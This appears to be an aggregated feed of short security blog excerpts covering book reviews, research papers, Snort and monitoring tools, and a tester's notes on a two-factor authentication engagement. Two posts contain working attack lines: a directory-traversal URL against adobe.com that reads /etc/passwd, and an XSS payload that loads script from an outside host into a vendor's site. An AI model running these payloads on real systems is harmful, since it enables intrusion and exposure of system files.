2 Factor Authentication Last Update

I think i am more or less done with my scope of work. There is simply no chance in hell that i can break that application. It like no matter what i entered, i always get a service not available or please try again later. Verified all the injection points and the stuffs that i can inject. Still, nothing can be done. The application is so sensitive and secure that it validates all input characters and escape all output characters. Lastly, every error...

Read More

Have you download your scancode?

I was reading on Shreeraj's article about source code review and it was overall a basic yet simple article on source code reviewing. Basically in the article, he teaches the audience from dependency determination to mitigation and countermeasures of a web application. On top of it, he included a tool where he coded himself called "scancode" which is used to scan source codes for potential entry point for XSS and SQLi. This is a must read for those who wants to know more about source code reviewing process and methoddology. Download scancode at...

Read More

Adobe Directory Traversal???????

The other night Christ1an showed me a link of Adobe.com with directory traversal. It was an old exploit, however it works on Adobe. This showed how Adobe is not taking application security seriously. Well, i managed to saw the entire /etc/passwd file and DAMN!! i did not take a screen shot of it. I was too careless and excited not to take a screenshot. The following day, the issue was resolved with reports being made to Adobe. Well check out the exploit here that was used against Adobe:http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=../../../../../../../../../etc/passwdAdd...

Read More

HashMaster v0.2

Damn, Rsnake just released a small yet useful program known as the hashmaster. I was auditing a customer last weekend, and the hashing was rather obfuscated and long. I am not sure if that was encryption or hashing, however i am going to try it on the customer this weekend. The program is very simple to use. Just enter the cleartext password and the hashing string into the form, and the program will fetch the hashing algorithm used. This is rather useful. Because once you know the hashing algorithm, you can then use cracking software to crack for...

Read More

Three Prereviews

I am fairly excited by several new books which arrived at my door last week. The first is Security Data Visualization by Greg Conti. I was pleased to see a book on visualization, but also a book in visualization in color! I expect to learn quite a bit from this book and hope to apply some of the lessons to my own work. The next book is End-to-End Network Security: Defense-in-Depth by Omar Santos. This book seems like a Cisco-centric approach to defending a network, but I decided to take a look when I noticed sections on forensics, visibility,...

Read More

Cyberinsurance in IT Security Management

One more thought before I retire this evening. I really enjoyed reading Cyberinsurance in IT Security Management by Walter S. Baer and Andrew Parkinson. Here are my favorite excerpts.IT security has traditionally referred to technical protective measures such as firewalls, authentication systems, and antivirus software to counter such attacks, and mitigation measures such as backup hardware and software systems to reduce losses should a security...

Read More

Security Staff as Ultimate Insurance

I'm continuing to cite the Fifth Annual Global State of Information Security:Speaking of striking back, the 2007 security survey shows a remarkable (some might say troubling) trend.The IT department wants to control security again.In the first year of collaboration on this survey, CIO, CSO and PWC noted that the more confident a company was in its security, the less likely that company's security group reported to IT. Those companies also spent more...

Read More

Visibility, Visibility, Visibility

CIO Magazine's Fifth Annual Global State of Information Security features an image of a happy, tie-wearing corporate security person laying bricks to make a wall, while a dark-clad intruder with a crow bar violates the laws of physics by lifting up another section of the wall like it was made of fabric. That's a very apt reference to Soccer Goal Security, and I plan to discuss security physics in a future post. Right now I'd like to feature a few...

Read More

Excerpts from Ross Anderson / Tyler Moore Paper

I got a chance to read a new paper by one of my three wise men (Ross Anderson) and his colleague (Tyler Moore): Information Security Economics - and Beyond. The following are my favorite sections.Over the last few years, people have realised that security failure is caused by bad incentives at least as often as by bad design. Systems are particularly prone to failure when the person guarding them does not suffer the full cost of failure...[R]isks...

Read More

Microsoft's Anemone Project

While flying to Los Angeles this week I read a great paper by Microsoft and Michigan researchers: Reclaiming Network-wide Visibility Using Ubiquitous Endsystem Monitors. From the Abstract:Network-centric tools like NetFlow and security systems like IDSes provide essential data about the availability, reliability, and security of network devices and applications. However, the increased use of encryption and tunnelling has reduced the visibility of...

Read More

Be the Caveman

I just read a great story by InformationWeek's Sharon Gaudin titled Interview With A Convicted Hacker: Robert Moore Tells How He Broke Into Routers And Stole VoIP Services:Convicted hacker Robert Moore, who is set to go to federal prison this week, says breaking into 15 telecommunications companies and hundreds of businesses worldwide was incredibly easy because simple IT mistakes left gaping technical holes.Moore, 23, of Spokane, Wash., pleaded...

Read More

Snort Report 9 Posted

My 9th Snort Report on Snort's Stream5 and TCP overlapping fragments is now available online. From the start of the article:It's important for value-added resellers and consultants to understand how Snort detects security events. Stream5 is a critical aspect of the inspection and detection equation. A powerful Snort preprocessor, Stream5 addresses several aspects of network-centric traffic inspection. Sourcefire calls Stream5 a "target-based" system,...

Read More

Can Your Machine Be Hacked?

Last night, i received an email from Rich Mclver and he gave me a link to publish. Basically, in his post, he provide users with ideas of how to secure holes in your PC. There are 12 tests and all of which gave an rough idea of how to secure your machine. Well, i would say it is a good start for those who wants to start learning about security overall. Check it out:http://www.virtualhosting.com/blog/2007/can-your-machine-be-hacked-test-yourself-with-these-12-resources/The Hacka ...

Read More

Blueinfy.com

Want to know more about Web 2.0 hacking? Want to have free Web 2.0 auditing tools and articles?Want to know more about web security and hacking?You will have to check out Blueinfy.com, it is definitely a site worth visiting. With great in depth articles to simple yet easily understandable presentation slides that will definitely make you hungry for more. The founder is none other than Shreeraj.Shah, an ex employee of Foundstone USA. Google him and you will know how powerful is he:)The Hacka ...

Read More

XSS on a vendors website

I am still testing on the application for flaws. However, it is so secure that i can't do a single thing. In the end, i end up testing a vendors site for XSS. The vendor did a good job of escaping < and > characters and it gave me <SCRIPT>alert(2)</SCRIPT> when i view the source code. I was dejected as i knew there is something more i can do. A few minutes later, .mario was online and i told him about my problem. Immediatedly, he came up with a trick that allows XSS to happen. So in the end, i entered " style="-moz-binding:url(http://h4k.in/mozxss.xml#xss)"...

Read More

DHS Debacle

Thanks to the Threat Level story FBI Investigates DHS Contractor for Failing to Protect Gov't Computer I learned of the Washington Post story Contractor Blamed in DHS Data Breaches:The FBI is investigating a major information technology firm with a $1.7 billion Department of Homeland Security contract after it allegedly failed to detect cyber break-ins traced to a Chinese-language Web site and then tried to cover up its deficiencies, according to...

Read More

2 Factor Authentication Update

I don't believe this, i can't basically do a SQL injection, CSRF or XSS! Everything i wanted to do is basically either encrypted or if i injection a simple character like ", it says service unavailable. This application can be considered very secure it terms of encryption and of good standard if weighing it against the OWASP top ten. Even if i enter a value like 10, this value will be encrypted with this:Name=eb56be300a5b19b600b5dac4f0e96834&EventName=Immediate&encryptedString=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZWoTRxslHOjxM7JapJ9tsvyp1ifrWjrgZjxiQfgS33znbhy2IaOqGNXFaA9rR4PvbsUFcqW0hVySynpxkNKRRxvxXJBIiCDlA9h1IK93ajLouNKITFaOVTBQSuK0upPOkjEuTJnbXM3qqZyf-i8amEULAXd4AhEkBBlGgjY8a9wWXJD61NJ-aPT5cVZ0s0H1ZZpvTto8NMRI1QiJAnYPMl4WXik8LTdChQ86n1OkUeP7Hfe4Fz13-JSEq%5E%5EvpgRjznQ4ZuLQ%5EHtMQ5D6yWWTRCPXtJ6jAj1Q2ZmYfPr9Q0uQX1YXN8UlwMXcf7igpQRXtR5yRwo3pm%5E6LJlmf7Hf94B4P26-K2iIOO%5EnVUeQbyZBt3YC4tNCWt8N5IFThY53-spUvlfRBAkwkwsK0NdkCajHGVoGLiynlc1J3GCIfZ0trlITgC9WntZgIOKXVZjTwYWe5hEAuqfHSMixUSCExNu4ZC4ZUQE%5EyK%5ElvKIl3Fd8fxx-GJjVajpHikGTHgfJ8KoeNH2SpUzEWPNQy63l4BkzqaeuJ7ssxeF%5EWhwcwfKuBzRF9rV5sss%5EP3WYjD4YsJvSZx%5EqXP1j8KIf6zfyh1xSqRJREWFXG5kSWXzlj03cL7SQmNjQupwJ9L25Km7GYhEUYfZYSsbNTr44vdkrpepIyLFRIITE29CZXXyVLrlK0OAIU7V9RfzJieGW0oBylrDqKK4VvLrKVbCj2t2hUwcDQwedGQK5J0O0W6v7Oeao9i9Y0keFg006rxP0gINtf8I9U5l%5E0RMvL7SQmNjQupyj1BfoSNNPOmsVd5RBRyJUy7dmjY1z6SxKT74w1LFyX9b-Wup4Bpykv-Ojshp82HwvLmlVapYc-I5yIyi5ev-%5E6-MiaJ-eATlq7nsFDamHtLjB09kFUKPMQArFYZzeyC1wNkE6i95PP80TJ0lPfgNkMuVhq5cxP2AXB7Kum3IJKcGeIJlpRTvpqBkeQ23jFVdIK61FykzXdSO6rlPpDFI0%5EYxJ2aAUQkn3hJJwOJW50AqBr4MBG-tU&encryptedString2=MDEyOABhBMQY7SY0WgxGKrWjOOjaB91Q%5ENy1-UynPGaVPNGwQU2bM2OR8S0f-n1SQ7Oi1IDEKHty-SGaT78SbOH-opKMolLmboo6xTgxtxth4AFbv2klQaA3ulkErBXn%5EMHuX661Ro%5EXou9P95OrVN8xYgUaY-AMZWCwuKy9cAvoiukPZfQSGPJ8Sz00GIRu7AqyMI3jMa6-sb5ZQJmYfPr9Q0uQs4F2ns3wU759YZpN-TxN6gqBr4MBG-tUI...

Read More

2 Factor Authentication Day 2

Damn, its getting tough! Have you guys seen a 6 digit password with an encryptedstring this long?ENCRYPTED_PASSWORD=9F9E9BB6E172C931C479665544ADC5BC96E9E7025B6E717CE3BF4BF43590C801A15DF75B2BA87C87A251D3ADE4E24966CFC3F6AA8DA8DACC89BCCD3326C1BB424569F950D5FD7EF07D42AD53E9832678375EB0D0B18E5FB1E7FEBEB23A957D6DA1E83EF4D784687571464BEBFF6B73376545B0124623C18250142786AECD5120Well, there is nothing more i can do? I dunno, still thinking:?????The Hacka ...

Read More

2 Factor Authentication?

Well, if you guys asked me if why i havent been updating my blog? I can only say that there is so much to be done in work and of course reading a lot on Rsnake's XSS exploit and defence. Been doing a lot of project management and technical work for my new company. I love my current company because of the flexible timing, nice colleagues and of course a very nice boss who is willing to listen to suggestions.Well back to the main topic, i had been assigned to hack an application with 2 factor authentication. Damn, all i can say is it is very secure...

Read More

Review of Snort IDS and IPS Toolkit and One Prereview

Amazon.com just posted my three star review of Snort IDS and IPS Toolkit. From the review:Syngress published "Snort 2.0" in Mar 03, and I gave it a four star review in Jul 03. Syngress followed with "Snort 2.1" in May 04, and I gave it a four star review in Jul 04. I recommend reading those reviews, since the latest edition -- "Snort IDS and IPS Toolkit" (SIAIT) -- makes many of the same mistakes as its predecessors. Worse, it includes material...

Read More

Pescatore on Security Trends

The article Spend less on IT security, says Gartner caught my attention. Comments are inline, and my apologies if Mr. Pescatore was misquoted.Organisations should aim to spend less of their IT budgets on security, Gartner vice-president John Pescatore told the analyst firm’s London IT Security Summit on 17 September.In a keynote speech, he said that retailers typically spend 1.5% of revenue trying to prevent crime, then still lose a further 1.5% through shoplifting and staff theft, costing 3% in total.Digital security is not comparable to shoplifting....

Read More

Tactical Network Security Monitoring Platform

I am working both strategic and tactical network security monitoring projects. On the tactical side I have been looking for a platform that I could carry on a plane and fit in the overhead compartment, or at the very least under the seat in front of me. Earlier in my career I've used Shuttle and Hacom boxes, but I'm always looking for something better.People often ask "Why don't you use a laptop?" Reasons to not use a laptop include:Laptops don't...

Read More

Security Jersey Colors

I realized after my previous post that not everyone may be familiar with the "color" system used to designate various military security teams. I referenced a "red team" in my post NSA IAM and IEM Summary, for example. I thought it might be helpful to post my understanding of these colors and to solicit feedback from anyone who could clarify these statements.Red Team: A Red Team is an adversary simulation team. The Red Team attacks the asset to...

Read More

Tactical Traffic Assessment

When I wrote Extrusion Detection in 2004-5 I used the term Traffic Threat Assessment to describe a means of inspecting network traffic for signs of malicious activity. I differentiated among various assessments using this terminology.A vulnerability assessment identifies vulnerabilities and exposures in assets.A penetration test identifies at least one way that an adversary could exploit vulnerabilities and exposures to compromise a target or satisfy a related objective.A traffic threat assessment identifies traffic that indicates a network has...

Read More

Wisdom from Ranum

The Face-Off article in the September 2007 Information Security Magazine contains a great closing thought by Marcus Ranum:Will the future be more secure? It'll be just as insecure as it possibly can, while still continuing to function. Just like it is today."Continuing to function" is an interesting concept. The reason the "Internet" hasn't been destroyed by terrorists, organized crime, or others is that doing so would cut off a major communication...

Read More

TFTPgrab

While I was teaching and speaking at conferences, I usually discussed research and coding projects with audience members. One of my requests involved writing a tool to reconstruct TFTP sessions. Because TFTP uses UDP, files transferred using TFTP cannot be rebuilt using Wireshark, TCPFlow, and similar tools. I was unaware of any tool that could rebuild TFTP transfers, despite the obvious benefit of being able to do so.Today I was very surprised...

Read More

Radiation Detection Mirrors Intrusion Detection

Yesterday I heard part of the NPR story Auditors, DHS Disagree on Radiation Detectors. I found two Internet sources, namely DHS fudged test results, watchdog agency says and DHS 'Dry Run' Support Cited, and I looked at COMBATING NUCLEARSMUGGLING: Additional Actions Needed to Ensure Adequate Testing of Next Generation Radiation Detection Equipment (.pdf), a GAO report.The report begins by explaining why it was written:The Department of Homeland Security’s...

Read More

The Academic Trap

I really enjoyed Anton's post Once More on Failure of Academic Research in Security where he cites Ian Greg's The Failure of the Academic Contribution to Security Science:[A]cademics have presented stuff that is sometimes interesting but rarely valuable. They've pretty much ignored all the work that was done before hand, and they've consequently missed the big picture.Why is this? One reason is above: academic work is only serious if it quotes other...

Read More

Anton Chuvakin's Age of Compliance Reports

I didn't pay close enough attention when Anton Chuvakin first mentioned this series of articles he's writing. His "Age of Compliance" series addresses various operational security issues and then describes how certain legal frameworks (Federal Information Security Management Act, Payment Card Industry Data Security Standard, Health Insurance Portability and Accountability Act, etc.) influence those activities.Thus far Anton has published:Incident...

Read More